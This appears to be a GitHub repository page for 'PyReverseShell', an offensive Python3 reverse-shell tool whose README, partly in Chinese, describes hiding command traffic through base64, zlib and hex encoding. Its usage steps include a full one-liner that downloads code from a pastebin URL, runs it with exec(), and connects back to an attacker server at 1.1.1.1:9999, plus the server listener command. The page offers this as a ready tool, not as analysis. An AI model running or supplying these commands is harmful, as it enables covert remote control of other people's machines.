Skip to content

al0ne/PyReverseShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

PyReverseShell

Python3 Reverse Shell

Python3 反弹shell 走加密流量,先把命令base64后然后zlib压缩,在转换为16进制

  1. 将client.txt上传到pastebin或者gist
  2. 服务器上运行 python3 server.py "0.0.0.0" 9999
  3. python3 -c "import urllib.request,socket,base64,zlib,binascii,subprocess;data=urllib.request.urlopen('https://pastebin.com/raw/xxxxxxx').read();exec(data);client('1.1.1.1',9999)"

About

Python3 Reverse Shell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages